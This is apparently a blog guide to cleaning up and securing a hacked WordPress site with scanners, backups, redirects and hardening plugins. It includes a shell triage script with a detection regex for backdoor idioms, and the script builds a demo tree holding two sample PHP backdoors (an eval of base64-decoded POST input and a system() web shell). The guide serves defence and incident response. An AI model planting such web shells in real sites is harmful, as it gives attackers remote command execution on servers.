WordPress Hacked! How to fix & prevent – An intermediate guide

WordPress hacked??

**Note: This will only work if you have access to your WP dashboard.

There are few things as unsettling as having your business or personal WordPress site hacked.

It makes you wonder: why would someone attack a site or business that has been nothing but kind online?

In one case, I saw a 501(c)(3) non-profit's (meaning they take 0 profit or salary) WordPress site get completely hijacked by hackers and used to create black-hat links promoting Cialis-like products and mail-order brides! How could someone do such a thing??

The motive is usually mundane: most of these compromises are automated and financial, with the hijacked site used to host spam links, phishing pages or malware, and sometimes drafted into DDoS botnets or identity-theft schemes. And at the end of the day, the reason doesn’t really matter. We just need to fix it!

Fixing the hack for free

Step #1: Virus Scan

The first step is to run a trusted malware-scanner plugin. It compares your WordPress core, plugin and theme files against the official copies, and checks the rest of your site’s code and database for known malicious patterns and suspicious changes.

Ready to spend a lot of $$ on anti-malware software? Me neither! Let’s download the free plugin, Wordfence.


Search for Wordfence in the plugin store, then install Wordfence Security

Follow instructions to get your license! It will involve Wordfence sending a license key to your email, which you will then use to activate the free software.


[Screenshot: Wordfence e-mail with license instructions]

Once you have the key, go back to the Wordfence plugin, click the button to activate your license, then enter your key & email. 

Then, when your key is activated, go to the left side of the WP dashboard, hover over Wordfence > Scan > click ‘Start New Scan’


Step #2: After the scan

When the scan is complete, it will list the vulnerabilities and issues it found on your WordPress site, using Wordfence’s database of known malware signatures and vulnerable plugin versions. Possible results include:

  • Critical problems found – If Wordfence flags suspicious code in a PHP file, don’t just delete the suspicious lines. If the file belongs to WordPress core, a plugin or a theme, replace the whole file with a fresh copy of the same version from wordpress.org or the theme vendor; if it’s a file that shouldn’t exist at all (a stray PHP file in wp-content/uploads, for example), delete it.
  • Plugin updates – Update out-dated plugins and themes. Known vulnerabilities in old versions are one of the most common ways hackers get in, and Wordfence will tell you which installed versions have published vulnerabilities.

**MAKE SURE TO BACKUP YOUR SITE before editing your code!!



[Screenshot: Wordfence scan result, ‘Critical problems found’]

[Screenshot: Wordfence scan result, ‘Plugin updates’]

Edit code or get some help!

Not to tell you how to live your life, but you may want to get some help when editing your PHP files. 

You can reach out to a programmer friend or family member, learn it yourself, or contact us or another professional/consultant to help you.

If you decide to make the changes yourself, here are two basic tools:

  • BACKUP. Back up your site! UpdraftPlus is a common plugin for this. You may also be able to back up through your hosting/website provider.
  • ChatGPT – If you’re unsure whether a piece of PHP is legitimate or malware (like the load_template code in the ‘Critical Error’ screenshot above), asking ChatGPT for a second opinion before deleting it is reasonable. Treat the answer as a hint, not a verdict: the reliable check is to compare the file against a fresh copy of the same theme or plugin version, and to be suspicious of anything that uses eval, base64_decode or similar obfuscation that the original does not.
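As an added example (not from the original post, and not Wordfence’s code), here is a small shell script that does the same kind of triage locally. It is useful for judging a scanner’s ‘critical’ findings and for the ‘is this PHP required or malware?’ question above. It flags PHP files under wp-content/uploads (a folder that should hold only media), files containing the obfuscation and remote-input idioms that backdoors rely on, and PHP files modified recently. The pattern list, the helper names and the sample site it builds are constructed assumptions; on a real site, run it from the WordPress root.

```shell
#!/bin/sh
# Local triage of a WordPress tree for injected PHP (added example; the pattern
# list and the sample files below are constructed assumptions, not a real site).
set -eu

# Obfuscation and remote-input idioms that legitimate theme code almost never uses.
SUSPICIOUS_RE='eval *\(|base64_decode *\(|gzinflate *\(|str_rot13 *\(|assert *\(|preg_replace *\(.*/e|(system|passthru|shell_exec|exec) *\( *\$_'

# 1. PHP under wp-content/uploads: uploads should contain media only, never code.
php_in_uploads() {  # usage: php_in_uploads <wordpress-root>
  find "$1/wp-content/uploads" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php.*' \) 2>/dev/null | sort
}

# 2. PHP files anywhere in the tree containing one of the idioms above.
suspicious_php() {  # usage: suspicious_php <wordpress-root>
  grep -rlE --include='*.php' "$SUSPICIOUS_RE" "$1" 2>/dev/null | sort || true
}

# 3. PHP files changed in the last N days (default 7); an attacker's edits cluster in time.
recently_modified() {  # usage: recently_modified <wordpress-root> [days]
  find "$1" -type f -name '*.php' -mtime "-${2:-7}" | sort
}

triage() {  # usage: triage <wordpress-root> [days]
  echo "== PHP under uploads (expected: none) =="; php_in_uploads "$1"
  echo "== obfuscation / remote-input idioms =="; suspicious_php "$1"
  echo "== PHP modified in the last ${2:-7} days =="; recently_modified "$1" "${2:-7}"
}
# On a real site, pair this with the authoritative comparison against wordpress.org:
#   wp core verify-checksums && wp plugin verify-checksums --all
# Restore files those report as modified from a fresh download instead of hand-editing them.

# Constructed sample tree so the script runs stand-alone: one clean theme file,
# one backdoored theme file, one PHP shell dropped into uploads.
make_sample_site() {  # usage: make_sample_site <empty-dir>
  mkdir -p "$1/wp-content/themes/demo" "$1/wp-content/uploads/2024/01"
  cat > "$1/wp-content/themes/demo/functions.php" <<'PHP'
<?php
// Clean theme code; calls like add_action() or load_template() are normal WordPress.
function demo_setup() { add_theme_support('title-tag'); }
add_action('after_setup_theme', 'demo_setup');
PHP
  cat > "$1/wp-content/themes/demo/header.php" <<'PHP'
<?php /* typical injected backdoor */ eval(base64_decode($_POST['c'])); ?>
PHP
  cat > "$1/wp-content/uploads/2024/01/image.php" <<'PHP'
<?php if (isset($_GET['x'])) { system($_GET['x']); } ?>
PHP
}

if [ "${1:-}" = "--demo" ]; then
  demo=$(mktemp -d); make_sample_site "$demo"; triage "$demo"; rm -rf "$demo"
fi
```

Run it with `--demo` to see the three lists on the constructed sample: the uploads check catches the dropped shell, the idiom check catches both the shell and the backdoored header.php but not the clean functions.php, and the modification-time check lists everything written recently. Anything it flags inside wp-content/plugins or wp-content/themes should still be checked against a fresh copy of the same version before you touch it.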

Consider other scanners!

You’re also encouraged to try other malware scanners if you want a second (or third or fourth) opinion. Just search the WordPress plugin store & pick a couple with good ratings.

The process will likely be very similar to the wordfence one.

Step #3: Fix disapproved landing pages

Even after your site is cleaned of malware, you still may be unable to get your landing page approved by Google Ads or others because of the content it previously served.

Ask the support team which malicious links or scripts they are still finding on the site, make sure they are permanently gone from your pages and database, and clear your site’s cache (and any CDN cache) so the reviewer sees the cleaned version.

Once the malware is gone from your site, you can usually fix a landing page disapproval by duplicating the original landing page & submitting it under a new URL.

Yep. That’s it.

If you’re not familiar with how to redirect:

  • Duplicate the disapproved landing page & give it a new URL
  • Delete/unpublish the original landing page
  • Install the Redirection plugin
  • Redirect the original (now unpublished) URL to the new (duplicated landing page) URL with a 301, so existing links and ads keep working

If you’re not familiar with caching:

  • Install the plugin W3 Total Cache (or use whichever caching plugin you already have)
  • Purge all caches

If you’d like me to talk more about caching, leave a comment or email me! 

**Note: Again, only do this if you’re sure the hack is fixed. Otherwise, you might be violating Google or another advertiser’s Circumventing Systems policy.

Step #4: Delete pages, posts, and comments from hacker

Now, it’s time to delete the content created by the hack. If this didn’t happen to you, congrats.

While you could manually delete all of the posts, categories, pages, and comments caused by the hack, I recommend downloading a magical & trusty ‘Bulk Delete’ plugin.

It will allow you to mass delete content, saving potentially hours of time of deleting page by page.

Step #5: Prevention

To prevent future hacks, I recommend downloading the following or similar plugins:

  1. Limit Login Attempts – It does what it says & helps stop brute-force attacks on your login page.
  2. WP All In One Security (AIOS) – This plugin is incredible, and gives you tons of control over your security. I got a paid plan myself & recommend it!
  3. Google reCAPTCHA – These are the ‘Prove you’re human’ tests that help stop bots. Keep this plugin up to date! Bots get better at solving these challenges all the time, so you want to be on the current reCAPTCHA version.
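The plugins above are dashboard-side protections. As an added example (not from the original post, and not part of AIOS or any plugin), here is a shell helper that applies two server-side settings WordPress itself documents in wp-config.php: DISALLOW_FILE_EDIT, which removes the theme and plugin code editor from the dashboard (the usual way a stolen admin login gets turned into the kind of PHP backdoor Step #2 dealt with), and FORCE_SSL_ADMIN, which keeps the login form and dashboard on HTTPS. The helper names and the sample wp-config.php it builds are assumptions; it inserts each constant just before the ‘stop editing’ marker every stock wp-config.php contains, and skips constants that are already defined.

```shell
#!/bin/sh
# Add hardening constants to wp-config.php (added example; helper names and the
# sample config are constructed). Back the file up before running it on a real site.
set -eu

# True if wp-config.php already defines the constant (either spacing style).
has_constant() {  # usage: has_constant <wp-config.php> <NAME>
  grep -qE "define\( *'$2'" "$1"
}

# Insert each missing constant before the "That's all, stop editing!" marker so it is
# defined before wp-settings.php loads. Idempotent: re-running changes nothing.
# DISALLOW_FILE_MODS (not listed) goes further and also blocks dashboard installs and
# updates; only add it if you update from the server with wp-cli or SFTP instead.
harden_wp_config() {  # usage: harden_wp_config <wp-config.php>
  cfg=$1
  if ! grep -q "stop editing" "$cfg"; then
    echo "no 'stop editing' marker in $cfg; refusing to guess an insertion point" >&2
    return 1
  fi
  while read -r name value; do
    if has_constant "$cfg" "$name"; then
      echo "skip: $name already defined"
      continue
    fi
    awk -v add="define('$name', $value);" \
      '/stop editing/ && !done { print add; done = 1 } { print }' "$cfg" > "$cfg.tmp"
    mv "$cfg.tmp" "$cfg"
    echo "added: $name = $value"
  done <<'EOF'
DISALLOW_FILE_EDIT true
FORCE_SSL_ADMIN true
EOF
}

# Constructed stand-in for a stock wp-config.php, trimmed to the relevant lines.
make_sample_config() {  # usage: make_sample_config <path>
  cat > "$1" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
EOF
}

if [ "${1:-}" = "--demo" ]; then
  cfg=$(mktemp); make_sample_config "$cfg"
  harden_wp_config "$cfg"; harden_wp_config "$cfg"   # second run reports "skip"
  cat "$cfg"; rm -f "$cfg"
fi
```

With the editor disabled, a compromised admin account can no longer paste a backdoor into functions.php from the browser, which means the cleanup in Step #2 is much less likely to be needed twice. If you use wp-cli, `wp config set DISALLOW_FILE_EDIT true --raw` does the same job for a single constant.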


AIOS - maximize security!

When setting up AIOS, make sure to hover over the WP Dashboard icon (on the left sidebar) in order to use all of the available features:

By using the “User Login” setting to change the WordPress login from “/wp-admin” to something secret, I stopped login attempts to my site! Keep in mind that this hides the login page from drive-by scanners rather than protecting it; strong, unique passwords and limited login attempts still matter for anyone who finds the new URL.

General - Consider deleting your email or phone number from your site.

I know that this seems crazy for a marketer to say, but for my site, this is the best option.

I got so tired of mass marketing spam emails to my personal email and phone that I removed my email address from my site. And guess what—it stopped the spam.

If someone needs to contact me, they can do it through my contact-us page. Oh well.

Theory: I think certain people in certain countries with low energy costs create massive email/phone address scraping bots which go through the Google search results, scraping the addresses from websites.

General - Backup, Update, and scan regularly.

Like I said, out-dated plugins & themes leave known vulnerabilities open for attackers to use.

Also, regularly backup your site (especially before updates) with Updraft Plus or through your hosting provider.

Lastly, don’t be afraid to run a malware scan even if nothing seems wrong! You never know what you’ll find.

It’s simple, but makes a big difference.

General - Don't display your theme name on your site.

AIOS lets you rename/hide theme files so it’s harder for hackers to figure out which theme you’re using.

Often, themes display their name in the footer of your website by default; remove that credit if possible! The theme name and version tell an attacker exactly which published vulnerabilities to try against you. Keep in mind this only slows a targeted attacker down, since theme assets are still served from predictable paths under /wp-content/themes/, so the real protection is keeping the theme updated.

In conclusion

I hope this guide was helpful in fixing existing hacks and/or preventing future ones!

With this knowledge, it should be easier to get back to marketing, advertising, and just plain existing online without fear or exploitation.

If you have questions or concerns, feel free to email me! Good luck & safe travels.